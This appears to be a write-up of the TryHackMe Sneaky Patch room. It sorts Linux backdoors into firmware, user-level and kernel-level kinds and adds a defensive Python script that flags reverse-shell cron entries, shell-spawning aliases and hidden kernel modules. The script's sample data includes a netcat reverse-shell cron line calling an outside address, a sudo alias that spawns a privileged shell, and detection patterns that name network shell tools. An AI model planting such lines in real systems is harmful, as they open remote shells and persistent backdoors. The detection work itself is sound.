• Detecting Linux Kernel Backdoors: TryHackMe Sneaky Patch Walkthrough

    In this analysis, I explore how to detect and investigate a kernel backdoor on a Linux system, a sophisticated threat that can be challenging to uncover.

    I also solve the TryHackMe Sneaky Patch room, which is a perfect demonstration of how to flag Linux backdoors.

    Understanding Linux Backdoors

    I begin by categorizing Linux backdoors into three main types:

    • BIOS/UEFI/initrd Backdoors: These are the most dangerous because they are installed in firmware or the early boot chain (BIOS/UEFI or the initrd), below the operating system. That lets them bypass standard security measures and even survive a complete reinstallation of the operating system. Removing them typically requires reflashing the BIOS.

    • User-Level Backdoors: These are the most common and include techniques like:

        • Modified Binaries: Altering programs (for example a login or authentication binary) so they accept a secret password.

        • Reverse Shells: Using scripts, such as those written with Netcat, to open a shell back to an attacker's system.

        • Cron Jobs: Scheduling tasks that re-establish a reverse shell or execute malicious commands.

        • Malicious Aliases: Editing .bashrc files to create aliases that spawn a shell.

    • Kernel-Level Backdoors: These are more advanced and involve modifying the Linux kernel itself, for example to hide processes from user-space tools. Because they operate with the highest privileges, they are much harder to detect. Examples of kernel-level rootkits include Adore-Ng and Diamorphine.
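    As an added example (not code from the original post or from the TryHackMe room), the following Python script performs defender-side triage for two of the categories above: it scans crontab and .bashrc lines for reverse-shell and shell-spawning alias indicators, and it compares the module list the kernel reports in /proc/modules with the directories under /sys/module, since a rootkit module that unlinks itself from the kernel's module list often still leaves a /sys/module entry behind. The function and constant names, the indicator patterns, the sample crontab and .bashrc lines, the module names and the 203.0.113.5 address are all constructed for this example.

```python
"""Triage helpers for user-level and kernel-level Linux backdoor indicators.

Added example, not part of the original post or the TryHackMe room.
All sample data below is constructed; adapt the patterns to your own fleet.
"""
import re
from typing import Dict, Iterable, List

# Command fragments commonly seen in reverse-shell persistence (constructed list).
REVERSE_SHELL_PATTERNS = [
    re.compile(r"\bnc\b.*\s-e\s"),     # netcat with the exec option
    re.compile(r"\bncat\b.*\s-e\s"),
    re.compile(r"/dev/tcp/"),          # bash network redirection
    re.compile(r"\bsocat\b.*exec:"),
    re.compile(r"\bmkfifo\b"),         # fifo-based shell relays
]

# An alias whose body invokes a shell interpreter is worth a manual look.
SHELL_ALIAS_PATTERN = re.compile(r"^\s*alias\s+\w+=['\"].*\b(sh|bash|dash|zsh)\b")


def scan_cron_lines(lines: Iterable[str]) -> List[str]:
    """Return crontab entries whose command matches a reverse-shell indicator."""
    hits = []
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # skip blanks and comments
        if any(p.search(stripped) for p in REVERSE_SHELL_PATTERNS):
            hits.append(stripped)
    return hits


def scan_bashrc_lines(lines: Iterable[str]) -> List[str]:
    """Return alias definitions that spawn a shell (a classic .bashrc backdoor)."""
    return [line.strip() for line in lines if SHELL_ALIAS_PATTERN.search(line)]


def find_hidden_modules(proc_modules: str, sysfs_module_names: Iterable[str],
                        builtin: Iterable[str] = ()) -> List[str]:
    """Return modules present under /sys/module but missing from /proc/modules.

    /proc/modules is what lsmod prints. A module that removes itself from the
    kernel's module list vanishes from it, yet its /sys/module directory usually
    remains. Built-in modules with parameters also appear under /sys/module, so
    pass the names from /lib/modules/<release>/modules.builtin as `builtin`
    to suppress those expected differences.
    """
    listed = {line.split()[0] for line in proc_modules.splitlines() if line.strip()}
    ignore = set(builtin)
    return sorted(m for m in sysfs_module_names if m not in listed and m not in ignore)


# --- constructed sample inputs -------------------------------------------------
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/apt-get update -q",
    "@reboot /usr/local/bin/sync-data --once",
    "* * * * * nc -e /bin/sh 203.0.113.5 4444",   # constructed indicator
]
SAMPLE_BASHRC = [
    "alias ll='ls -la'",
    "alias grep='grep --color=auto'",
    "alias sudo='/bin/bash -p; sudo'",             # constructed indicator
]
SAMPLE_PROC_MODULES = (
    "ext4 1048576 2 - Live 0xffffffffc0a00000\n"
    "xfs 2097152 0 - Live 0xffffffffc0c00000\n"
)
SAMPLE_SYSFS_MODULES = ["ext4", "xfs", "sneaky_mod", "printk"]  # sneaky_mod is constructed
SAMPLE_BUILTIN = ["printk"]


def run_triage() -> Dict[str, List[str]]:
    """Run all three checks over the constructed samples and return the findings."""
    return {
        "cron": scan_cron_lines(SAMPLE_CRONTAB),
        "bashrc": scan_bashrc_lines(SAMPLE_BASHRC),
        "hidden_modules": find_hidden_modules(
            SAMPLE_PROC_MODULES, SAMPLE_SYSFS_MODULES, SAMPLE_BUILTIN),
    }


if __name__ == "__main__":
    for check, findings in run_triage().items():
        print(f"{check}: {findings or 'no findings'}")
```

    On a live host you would feed `scan_cron_lines` the output of `crontab -l` for each user plus the files under /etc/cron.d, feed `scan_bashrc_lines` each user's ~/.bashrc and ~/.profile, and build the sysfs list from `os.listdir('/sys/module')`. The module comparison is a cheap first check, not proof of absence: a rootkit can also remove its sysfs entry, which is why the kernel-level category is harder to flag and typically needs an offline or memory-based comparison as well.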

    The full writeup is available here.

    The full video is available here.